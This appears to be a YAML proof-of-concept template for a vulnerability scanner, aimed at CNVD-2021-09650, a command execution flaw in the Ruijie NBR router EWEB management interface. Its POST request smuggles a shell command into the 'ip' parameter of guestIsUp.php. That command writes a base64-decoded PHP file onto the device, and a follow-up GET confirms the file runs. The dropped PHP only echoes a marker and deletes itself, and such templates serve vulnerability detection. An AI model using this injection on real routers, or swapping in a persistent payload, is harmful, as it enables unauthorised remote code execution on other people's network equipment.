id: CNVD-2021-09650

info:
    name: 锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞
    author: White(https://github.com/WhiteHSBG)
    severity: high
    reference:
        - https://xz.aliyun.com/t/9016?page=1
        - https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/

set:
    r1: randomLowercase(4)
    r2: randomLowercase(4)
    phpcode: >
        "<?php echo '" + r1 + "'; unlink(__FILE__); ?>"
    payload: base64(phpcode)
rules:
    r0:
        request:
            method: POST
            path: /guest_auth/guestIsUp.php
            body: |
                ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00
        expression: response.status == 200 && !response.body.bcontains(b'"success":false')
    r1:
        request:
            method: GET
            path: /guest_auth/{{r2}}.php
        expression: response.status == 200 && response.body.bcontains(bytes(r1)) && !response.body.bcontains(b'"success":false')
expression: r0() && r1()